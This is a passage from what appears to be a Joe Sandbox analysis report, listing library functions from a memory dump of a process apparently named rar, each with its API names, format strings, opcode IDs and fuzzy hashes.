                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                      • Instruction ID: b4d9e4d65a26bbbeea8c3aff963bd533ffab7d52ae6a831f7095f7239bd2f2a4
                                                                                                                                                                      • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                      • Instruction Fuzzy Hash: 22A1F163B0878246FF608B60C4503B92691AF64BA4F4B4635EA5D867C5DFBFE464C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE797AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                      • Instruction ID: 9def6481a328c7a95d0b3412f7321ac0d93a02899559292571c8be048c922189
                                                                                                                                                                      • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                      • Instruction Fuzzy Hash: 7581DC23A1864285FF208B65D4907BC26A4BF66B88F474135FD0E87790DFBBE461C31A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE797428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3659116390-0
                                                                                                                                                                      • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                      • Instruction ID: f8f45263a325e1523646482531c44f824e222b8a45a7327bacea0bf3b141844d
                                                                                                                                                                      • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                      • Instruction Fuzzy Hash: 7551D333A14A518AEB11CF65E4443AC3BB0FB54B98F068135EE4E87798DF7AD161C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7480C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 643171463-0
                                                                                                                                                                      • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                      • Instruction ID: 2ca82fd1005f8bc6034c42b2cbae92123bff5a731ad1871ded0df8274b3eee23
                                                                                                                                                                      • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E41CA53E0C68642FF109B20E8003B96251AF65BA0F06033AF96D977D5DFBEE565C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7969B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 190572456-0
                                                                                                                                                                      • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                      • Instruction ID: f37647c7b00c15b6d2c87970589ea1896db2cb987b2ce49ec239aefc5b096a38
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6641C363B0D60191EF119B92E8047B56295BF24B90F1B8635FD5D8B788EE7EE420C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE79DC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                      • Instruction ID: c04437dad10109121c00150310c237cf823296e8df9107a9be682f804757bca9
                                                                                                                                                                      • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                      • Instruction Fuzzy Hash: 44113067E18A0309FF551164E48637B2141AF763A0F474A34FB6E966D6CFEFA460C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE747514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr$BeepMessage
                                                                                                                                                                      • String ID: ($[%c]%ls
                                                                                                                                                                      • API String ID: 1408639281-228076469
                                                                                                                                                                      • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                      • Instruction ID: 044b7cd04b320dd50605be9959029b69bfa36d1d227dea4e8af5ae1e30249ba9
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                      • Instruction Fuzzy Hash: 6381E623A0864186EF60CF05E4403BA67A1FB98B88F460136FE4E97759DF7EE522C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE756FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                      • API String ID: 233258989-622958660
                                                                                                                                                                      • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                      • Instruction ID: 03a68fd4c53520bab831e7178da2a4d85181468c0677c9f91ed2b2cb543d4a6d
                                                                                                                                                                      • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                      • Instruction Fuzzy Hash: 275136F3F3C2848AE7548F1CE881BA92690F374B91F555A24F94AD3B44CA3EDA04C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE746E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr
                                                                                                                                                                      • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                      • API String ID: 1497570035-1725859250
                                                                                                                                                                      • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                      • Instruction ID: a923d18856f1e3654f9f4654e9dd6656215b29b27196d5e28132f102f0701262
                                                                                                                                                                      • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                      • Instruction Fuzzy Hash: 46416D53E0D58380EF219AA0E1417795661AF34B84F5A4032FA5D862D5EEBFE472C32B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE753528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00007FF6EE75359E
                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EE7535E6
                                                                                                                                                                        • Part of subcall function 00007FF6EE7530C8: GetFileAttributesW.KERNELBASE(00000800,00007FF6EE75305D,?,?,?,?,?,?,?,?,00007FF6EE764126,?,?,?,?,00000800), ref: 00007FF6EE7530F0
                                                                                                                                                                        • Part of subcall function 00007FF6EE7530C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6EE764126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6EE753119
                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EE753651
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                      • String ID: %u.%03u
                                                                                                                                                                      • API String ID: 2814246642-1114938957
                                                                                                                                                                      • Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                      • Instruction ID: 75a7cd9e6e95f8efed017bc11b62b38021643b18969eece4664f83efc7365bde
                                                                                                                                                                      • Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                                                                                                                                      • Instruction Fuzzy Hash: EE316B23A0868151EF149B24E4103AA6260F7A47B4F511336FD7E87BF8DE7ED42AC305
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE797854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 2456169464-4171548499
                                                                                                                                                                      • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
